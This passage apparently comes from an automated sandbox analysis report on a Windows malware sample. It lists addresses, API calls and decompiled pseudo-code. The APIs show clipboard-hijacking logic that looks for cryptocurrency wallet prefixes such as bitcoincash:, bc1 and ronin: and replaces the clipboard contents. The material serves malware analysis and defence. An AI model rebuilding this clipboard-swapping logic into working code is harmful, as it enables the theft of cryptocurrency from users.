                                                                                                                                                                                                                                                                                    0x00403c1b
                                                                                                                                                                                                                                                                                    0x00403c7b
                                                                                                                                                                                                                                                                                    0x00403c8e
                                                                                                                                                                                                                                                                                    0x00403c90
                                                                                                                                                                                                                                                                                    0x00403c90
                                                                                                                                                                                                                                                                                    0x00403ca8
                                                                                                                                                                                                                                                                                    0x00403caa
                                                                                                                                                                                                                                                                                    0x00403caa
                                                                                                                                                                                                                                                                                    0x00403cc2
                                                                                                                                                                                                                                                                                    0x00403cc4
                                                                                                                                                                                                                                                                                    0x00403cc4
                                                                                                                                                                                                                                                                                    0x00403cc2
                                                                                                                                                                                                                                                                                    0x00403cdc
                                                                                                                                                                                                                                                                                    0x00403cde
                                                                                                                                                                                                                                                                                    0x00403cde
                                                                                                                                                                                                                                                                                    0x00403cf6
                                                                                                                                                                                                                                                                                    0x00403cf8
                                                                                                                                                                                                                                                                                    0x00403cf8
                                                                                                                                                                                                                                                                                    0x00403d10
                                                                                                                                                                                                                                                                                    0x00403d12
                                                                                                                                                                                                                                                                                    0x00403d12
                                                                                                                                                                                                                                                                                    0x00403d2a
                                                                                                                                                                                                                                                                                    0x00403d2c
                                                                                                                                                                                                                                                                                    0x00403d2c
                                                                                                                                                                                                                                                                                    0x00403d44
                                                                                                                                                                                                                                                                                    0x00403d46
                                                                                                                                                                                                                                                                                    0x00403d46
                                                                                                                                                                                                                                                                                    0x00403d56
                                                                                                                                                                                                                                                                                    0x00403d5c
                                                                                                                                                                                                                                                                                    0x00403d6b
                                                                                                                                                                                                                                                                                    0x00403d76
                                                                                                                                                                                                                                                                                    0x00403d6d
                                                                                                                                                                                                                                                                                    0x00403d6d
                                                                                                                                                                                                                                                                                    0x00403d6d
                                                                                                                                                                                                                                                                                    0x00403d5e
                                                                                                                                                                                                                                                                                    0x00403d5e
                                                                                                                                                                                                                                                                                    0x00403d5e
                                                                                                                                                                                                                                                                                    0x00403d5c
                                                                                                                                                                                                                                                                                    0x00403d86
                                                                                                                                                                                                                                                                                    0x00403d8c
                                                                                                                                                                                                                                                                                    0x00403d8e
                                                                                                                                                                                                                                                                                    0x00403d8e
                                                                                                                                                                                                                                                                                    0x00403d99
                                                                                                                                                                                                                                                                                    0x00403d9b
                                                                                                                                                                                                                                                                                    0x00403d9b
                                                                                                                                                                                                                                                                                    0x00403d99
                                                                                                                                                                                                                                                                                    0x00403dab
                                                                                                                                                                                                                                                                                    0x00403db1
                                                                                                                                                                                                                                                                                    0x00403dc6
                                                                                                                                                                                                                                                                                    0x00403de0
                                                                                                                                                                                                                                                                                    0x00403de0
                                                                                                                                                                                                                                                                                    0x00403db3
                                                                                                                                                                                                                                                                                    0x00403db3
                                                                                                                                                                                                                                                                                    0x00403db3
                                                                                                                                                                                                                                                                                    0x00403db1
                                                                                                                                                                                                                                                                                    0x00403df0
                                                                                                                                                                                                                                                                                    0x00403df2
                                                                                                                                                                                                                                                                                    0x00403df2
                                                                                                                                                                                                                                                                                    0x00403e03
                                                                                                                                                                                                                                                                                    0x00403e0a
                                                                                                                                                                                                                                                                                    0x00403e1e
                                                                                                                                                                                                                                                                                    0x00403e25
                                                                                                                                                                                                                                                                                    0x00403e31
                                                                                                                                                                                                                                                                                    0x00403e38
                                                                                                                                                                                                                                                                                    0x00403e49
                                                                                                                                                                                                                                                                                    0x00403e55
                                                                                                                                                                                                                                                                                    0x00403e65
                                                                                                                                                                                                                                                                                    0x00403e67
                                                                                                                                                                                                                                                                                    0x00403e73
                                                                                                                                                                                                                                                                                    0x00403e79
                                                                                                                                                                                                                                                                                    0x00403e79
                                                                                                                                                                                                                                                                                    0x00403e65
                                                                                                                                                                                                                                                                                    0x00403e38
                                                                                                                                                                                                                                                                                    0x00403e25
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004038cd
                                                                                                                                                                                                                                                                                    0x004038cd
                                                                                                                                                                                                                                                                                    0x004038df
                                                                                                                                                                                                                                                                                    0x004038f0
                                                                                                                                                                                                                                                                                    0x00403926
                                                                                                                                                                                                                                                                                    0x00403930
                                                                                                                                                                                                                                                                                    0x00403931
                                                                                                                                                                                                                                                                                    0x00403936
                                                                                                                                                                                                                                                                                    0x0040393b
                                                                                                                                                                                                                                                                                    0x0040395b
                                                                                                                                                                                                                                                                                    0x004038dc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004038dc
                                                                                                                                                                                                                                                                                    0x0040393d
                                                                                                                                                                                                                                                                                    0x00403947
                                                                                                                                                                                                                                                                                    0x00403948
                                                                                                                                                                                                                                                                                    0x0040394d
                                                                                                                                                                                                                                                                                    0x00403952
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040391f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040391f
                                                                                                                                                                                                                                                                                    0x004038f0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004038df
                                                                                                                                                                                                                                                                                    0x004038c7

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040349C
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 0040376C
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00403797
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 004037C2
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00403884
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040389B
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 004038B2
                                                                                                                                                                                                                                                                                    • isalpha.NTDLL ref: 00403931
                                                                                                                                                                                                                                                                                    • isdigit.NTDLL ref: 00403948
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bnb), ref: 00403C86
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,band), ref: 00403CA0
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1), ref: 00403CBA
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 00403CD4
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00403CEE
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00403D08
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00403D22
                                                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 00403D3C
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00403DFD
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 00403E18
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00403E2B
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,-00000001), ref: 00403E49
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00403E55
                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00403E5D
                                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00403E67
                                                                                                                                                                                                                                                                                    • SetClipboardData.USER32 ref: 00403E73
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00403E79
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                                                                                                                                                                                                                                                                    • String ID: 0$addr$addr$band$bc1$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$nano_$nano_$ronin:$ronin:$x A
                                                                                                                                                                                                                                                                                    • API String ID: 2780752356-2942954336
                                                                                                                                                                                                                                                                                    • Opcode ID: 44cbdba9deeb7107d8b3b7d2097c7be82a0ef0baedef9415574d6a77df896170
                                                                                                                                                                                                                                                                                    • Instruction ID: d632528e84cd7d79e58a61d2646b08debe5d79a97a260add38f67847cdb8d2ff
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44cbdba9deeb7107d8b3b7d2097c7be82a0ef0baedef9415574d6a77df896170
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A624A70A00218EACB248F55C0944BE7FBAAF42752F20C46BE8856F294D779DFD1DB58
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00406610(intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				signed int _t1394;
                                                                                                                                                                                                                                                                                    				signed int _t1396;
                                                                                                                                                                                                                                                                                    				signed int _t1397;
                                                                                                                                                                                                                                                                                    				signed int _t1398;
                                                                                                                                                                                                                                                                                    				signed int _t1399;
                                                                                                                                                                                                                                                                                    				signed int _t1403;
                                                                                                                                                                                                                                                                                    				signed int _t1413;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1414;
                                                                                                                                                                                                                                                                                    				signed int _t1424;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1425;
                                                                                                                                                                                                                                                                                    				signed int _t1435;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1436;
                                                                                                                                                                                                                                                                                    				signed int _t1446;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1447;
                                                                                                                                                                                                                                                                                    				signed int _t1457;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1458;
                                                                                                                                                                                                                                                                                    				signed int _t1468;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1469;
                                                                                                                                                                                                                                                                                    				signed int _t1479;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1480;
                                                                                                                                                                                                                                                                                    				signed int _t1490;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1491;
                                                                                                                                                                                                                                                                                    				signed int _t1501;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1502;
                                                                                                                                                                                                                                                                                    				signed int _t1512;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1513;
                                                                                                                                                                                                                                                                                    				signed int _t1523;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1524;
                                                                                                                                                                                                                                                                                    				signed int _t1534;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1535;
                                                                                                                                                                                                                                                                                    				signed int _t1545;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1546;
                                                                                                                                                                                                                                                                                    				signed int _t1556;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1557;
                                                                                                                                                                                                                                                                                    				signed int _t1567;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1568;
                                                                                                                                                                                                                                                                                    				signed int _t1577;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1579;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1580;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1581;
                                                                                                                                                                                                                                                                                    				signed int _t1582;
                                                                                                                                                                                                                                                                                    				signed int _t1588;
                                                                                                                                                                                                                                                                                    				signed int _t1589;
                                                                                                                                                                                                                                                                                    				signed int _t1590;
                                                                                                                                                                                                                                                                                    				signed int _t1591;
                                                                                                                                                                                                                                                                                    				signed int _t1595;
                                                                                                                                                                                                                                                                                    				signed int _t1598;
                                                                                                                                                                                                                                                                                    				signed int _t1599;
                                                                                                                                                                                                                                                                                    				signed int _t1600;
                                                                                                                                                                                                                                                                                    				signed int _t1601;
                                                                                                                                                                                                                                                                                    				signed int _t1605;
                                                                                                                                                                                                                                                                                    				signed int _t1608;
                                                                                                                                                                                                                                                                                    				signed int _t1609;
                                                                                                                                                                                                                                                                                    				signed int _t1610;
                                                                                                                                                                                                                                                                                    				signed int _t1611;
                                                                                                                                                                                                                                                                                    				signed int _t1615;
                                                                                                                                                                                                                                                                                    				signed int _t1618;
                                                                                                                                                                                                                                                                                    				signed int _t1619;
                                                                                                                                                                                                                                                                                    				signed int _t1620;
                                                                                                                                                                                                                                                                                    				signed int _t1621;
                                                                                                                                                                                                                                                                                    				signed int _t1625;
                                                                                                                                                                                                                                                                                    				signed int _t1628;
                                                                                                                                                                                                                                                                                    				signed int _t1629;
                                                                                                                                                                                                                                                                                    				signed int _t1630;
                                                                                                                                                                                                                                                                                    				signed int _t1631;
                                                                                                                                                                                                                                                                                    				signed int _t1635;
                                                                                                                                                                                                                                                                                    				signed int _t1638;
                                                                                                                                                                                                                                                                                    				signed int _t1639;
                                                                                                                                                                                                                                                                                    				signed int _t1640;
                                                                                                                                                                                                                                                                                    				signed int _t1641;
                                                                                                                                                                                                                                                                                    				signed int _t1645;
                                                                                                                                                                                                                                                                                    				signed int _t1648;
                                                                                                                                                                                                                                                                                    				signed int _t1649;
                                                                                                                                                                                                                                                                                    				signed int _t1650;
                                                                                                                                                                                                                                                                                    				signed int _t1651;
                                                                                                                                                                                                                                                                                    				signed int _t1655;
                                                                                                                                                                                                                                                                                    				signed int _t1658;
                                                                                                                                                                                                                                                                                    				signed int _t1659;
                                                                                                                                                                                                                                                                                    				signed int _t1660;
                                                                                                                                                                                                                                                                                    				signed int _t1661;
                                                                                                                                                                                                                                                                                    				signed int _t1665;
                                                                                                                                                                                                                                                                                    				signed int _t1668;
                                                                                                                                                                                                                                                                                    				signed int _t1669;
                                                                                                                                                                                                                                                                                    				signed int _t1670;
                                                                                                                                                                                                                                                                                    				signed int _t1671;
                                                                                                                                                                                                                                                                                    				signed int _t1675;
                                                                                                                                                                                                                                                                                    				signed int _t1678;
                                                                                                                                                                                                                                                                                    				signed int _t1679;
                                                                                                                                                                                                                                                                                    				signed int _t1680;
                                                                                                                                                                                                                                                                                    				signed int _t1681;
                                                                                                                                                                                                                                                                                    				signed int _t1685;
                                                                                                                                                                                                                                                                                    				signed int _t1688;
                                                                                                                                                                                                                                                                                    				signed int _t1689;
                                                                                                                                                                                                                                                                                    				signed int _t1690;
                                                                                                                                                                                                                                                                                    				signed int _t1691;
                                                                                                                                                                                                                                                                                    				signed int _t1695;
                                                                                                                                                                                                                                                                                    				signed int _t1698;
                                                                                                                                                                                                                                                                                    				signed int _t1699;
                                                                                                                                                                                                                                                                                    				signed int _t1700;
                                                                                                                                                                                                                                                                                    				signed int _t1701;
                                                                                                                                                                                                                                                                                    				signed int _t1705;
                                                                                                                                                                                                                                                                                    				signed int _t1708;
                                                                                                                                                                                                                                                                                    				signed int _t1709;
                                                                                                                                                                                                                                                                                    				signed int _t1710;
                                                                                                                                                                                                                                                                                    				signed int _t1711;
                                                                                                                                                                                                                                                                                    				signed int _t1715;
                                                                                                                                                                                                                                                                                    				signed int _t1718;
                                                                                                                                                                                                                                                                                    				signed int _t1719;
                                                                                                                                                                                                                                                                                    				signed int _t1720;
                                                                                                                                                                                                                                                                                    				signed int _t1721;
                                                                                                                                                                                                                                                                                    				signed int _t1725;
                                                                                                                                                                                                                                                                                    				signed int _t1728;
                                                                                                                                                                                                                                                                                    				signed int _t1729;
                                                                                                                                                                                                                                                                                    				signed int _t1730;
                                                                                                                                                                                                                                                                                    				signed int _t1731;
                                                                                                                                                                                                                                                                                    				signed int _t1735;
                                                                                                                                                                                                                                                                                    				signed int _t1738;
                                                                                                                                                                                                                                                                                    				signed int _t1748;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1749;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1755;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1756;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1757;
                                                                                                                                                                                                                                                                                    				signed int _t1758;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1767;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1768;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1769;
                                                                                                                                                                                                                                                                                    				signed int _t1770;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1779;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1780;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1781;
                                                                                                                                                                                                                                                                                    				signed int _t1782;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1791;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1792;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1793;
                                                                                                                                                                                                                                                                                    				signed int _t1794;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1803;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1804;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1805;
                                                                                                                                                                                                                                                                                    				signed int _t1806;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1815;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1816;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1817;
                                                                                                                                                                                                                                                                                    				signed int _t1818;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1827;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1828;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1829;
                                                                                                                                                                                                                                                                                    				signed int _t1830;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1839;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1840;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1841;
                                                                                                                                                                                                                                                                                    				signed int _t1842;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1851;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1852;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1853;
                                                                                                                                                                                                                                                                                    				signed int _t1854;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1863;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1864;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1865;
                                                                                                                                                                                                                                                                                    				signed int _t1866;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1875;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1876;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1877;
                                                                                                                                                                                                                                                                                    				signed int _t1878;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1887;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1888;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1889;
                                                                                                                                                                                                                                                                                    				signed int _t1890;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1899;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1900;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1901;
                                                                                                                                                                                                                                                                                    				signed int _t1902;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1911;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1912;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1913;
                                                                                                                                                                                                                                                                                    				signed int _t1914;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1923;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1924;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1925;
                                                                                                                                                                                                                                                                                    				signed int _t1926;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2043;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2044;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2045;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2050;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2051;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2052;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2057;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2058;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2059;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2064;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2065;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2066;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2071;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2072;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2073;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2078;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2079;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2080;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2085;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2086;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2087;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2092;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2093;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2094;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2099;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2100;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2101;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2106;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2107;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2108;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2113;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2114;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2115;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2120;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2121;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2122;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2127;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2128;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2129;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2134;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2135;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2136;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2141;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2142;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2143;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2148;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2149;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2150;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1394 =  *0x411120; // 0x89abcdef
                                                                                                                                                                                                                                                                                    				_v28 = _t1394;
                                                                                                                                                                                                                                                                                    				_t1577 =  *0x411124; // 0x1234567
                                                                                                                                                                                                                                                                                    				_v24 = _t1577;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0x59;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t1396 = _a8 << 4;
                                                                                                                                                                                                                                                                                    					if(_v32 >= _t1396) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1397 = _v16;
                                                                                                                                                                                                                                                                                    					_t1579 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1579 + _t1397 * 8 - 0x2c8);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1579 + _t1397 * 8 - 0x2c4);
                                                                                                                                                                                                                                                                                    					_t1398 = _v16;
                                                                                                                                                                                                                                                                                    					_t1580 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1580 + _t1398 * 8 - 0x88);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1580 + _t1398 * 8 - 0x84);
                                                                                                                                                                                                                                                                                    					_t1399 = _v16;
                                                                                                                                                                                                                                                                                    					_t1581 = _a4;
                                                                                                                                                                                                                                                                                    					_t1748 = _v16;
                                                                                                                                                                                                                                                                                    					_t2043 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1581 + _t1399 * 8 - 0x90) &  *(_t2043 + _t1748 * 8 - 0xa8) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1581 + _t1399 * 8 - 0x8c) &  *(_t2043 + _t1748 * 8 - 0xa4) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1582 = _v16;
                                                                                                                                                                                                                                                                                    					_t1749 = _a4;
                                                                                                                                                                                                                                                                                    					_t1403 = _v16;
                                                                                                                                                                                                                                                                                    					_t2044 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1749 + _t1582 * 8 - 0xf8) &  *(_t2044 + _t1403 * 8 - 0x218) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1749 + _t1582 * 8 - 0xf4) &  *(_t2044 + _t1403 * 8 - 0x214) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1588 = _v16;
                                                                                                                                                                                                                                                                                    					_t2045 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2045 + _t1588 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2045 + 4 + _t1588 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1589 = _v16;
                                                                                                                                                                                                                                                                                    					_t1755 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1755 + _t1589 * 8 - 0x2c0);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1755 + _t1589 * 8 - 0x2bc);
                                                                                                                                                                                                                                                                                    					_t1590 = _v16;
                                                                                                                                                                                                                                                                                    					_t1756 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1756 + _t1590 * 8 - 0x80);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1756 + _t1590 * 8 - 0x7c);
                                                                                                                                                                                                                                                                                    					_t1591 = _v16;
                                                                                                                                                                                                                                                                                    					_t1757 = _a4;
                                                                                                                                                                                                                                                                                    					_t1413 = _v16;
                                                                                                                                                                                                                                                                                    					_t2050 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1757 + _t1591 * 8 - 0x88) &  *(_t2050 + _t1413 * 8 - 0xa0) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1757 + _t1591 * 8 - 0x84) &  *(_t2050 + _t1413 * 8 - 0x9c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1758 = _v16;
                                                                                                                                                                                                                                                                                    					_t1414 = _a4;
                                                                                                                                                                                                                                                                                    					_t1595 = _v16;
                                                                                                                                                                                                                                                                                    					_t2051 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1414 + _t1758 * 8 - 0xf0) &  *(_t2051 + _t1595 * 8 - 0x210) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1414 + _t1758 * 8 - 0xec) &  *(_t2051 + _t1595 * 8 - 0x20c) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1598 = _v16;
                                                                                                                                                                                                                                                                                    					_t2052 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2052 + 8 + _t1598 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2052 + 0xc + _t1598 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1599 = _v16;
                                                                                                                                                                                                                                                                                    					_t1767 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1767 + _t1599 * 8 - 0x2b8);
